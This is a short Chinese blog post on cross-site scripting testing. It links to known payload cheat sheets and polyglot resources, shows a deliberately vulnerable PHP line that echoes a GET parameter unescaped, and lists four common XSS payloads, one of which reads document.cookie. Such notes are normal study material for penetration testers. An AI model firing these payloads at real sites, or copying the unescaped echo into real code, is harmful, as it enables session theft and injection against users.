xss payload以及polyglots应用

  • by

资源的重要性,这些资源也是在《渗透测试实战第三版》找到的

个人以前花了很多时间去搜寻相关payload,后来发现都是已经总结好了很久的,要说知识点,就是javascript的函数利用,html的标签闭合,基本就一句payload,也没有其他的注意事项

1.xss payload:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://github.com/foospidy/payloads

简单测试下,发现有很多都没有反应了,可能各种各样的原因

测试代码:

<?php
echo $_GET['id'];

记录几个常用的(其中最下面的top利用,可以详细看下,不用<>和‘’进行xss测试,也是个人在一篇实战文章通过top方法获取cookies看到的):

<b onmouseover=alert('XSS')>Click Me!</b> 
<svg onload=alert(1)> 
<body onload="alert('XSS')">
<img src="" onerror=alert(document.cookie);>

2.不同浏览器以及它的不同版本的特性,xss利用

https://html5sec.org/

3.xss的polyglots应用

直接一句payload判断是否存在xss

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

文中有相应的链接,分别从input img href等标签进行了举例

2019.11.15

发表评论

电子邮件地址不会被公开。 必填项已用*标注